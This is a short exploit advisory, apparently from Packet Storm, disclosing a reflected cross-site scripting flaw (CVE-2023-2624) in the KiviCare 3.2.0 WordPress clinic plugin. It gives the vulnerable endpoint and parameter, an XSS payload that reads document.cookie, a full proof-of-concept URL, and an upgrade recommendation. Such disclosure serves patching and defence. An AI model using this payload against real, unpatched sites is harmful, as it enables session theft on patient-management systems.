Share
## https://sploitus.com/exploit?id=PACKETSTORM:174895
# Exploit Title: WP Plugins KiviCare 3.2.0 - Reflected Cross-Site Scripting  
# Date: 03-10-2023  
# Exploit Author: Arvandy  
# Software Link: https://wordpress.org/plugins/kivicare-clinic-management-system/  
# Vendor Homepage: https://kivicare.io/  
# Version: 3.2.0  
# Tested on: Windows, Linux  
# CVE: CVE-2023-2624  
  
# Product Description  
KiviCare is the most affordable self-hosted clinic and patient management system based on the WordPress platform. Set up your online clinic in no time. Ref: https://kivicare.io/  
  
# Vulnerability overview:  
The Wordpress plugins KiviCare - Clinic & Patient Management System (EHR) <= 3.2.0 is vulnerable to reflected cross-site scripting via the filterType parameter in the get weekly appointment function. This vulnerability could allow a malicious actor to inject malicious scripts.  
  
# Proof of Concept:  
  
Affected Endpoint: /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_weekly_appointment&filterType=  
Affected Parameters: filterType  
XSS Payload: <img src=x onerror=alert(document.cookie)>  
http://192.168.56.115/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_weekly_appointment&filterType=%3Cimg%20src=x%20onerror=alert(document.cookie)%3E  
  
# Recommendation  
Upgrade to version 3.2.1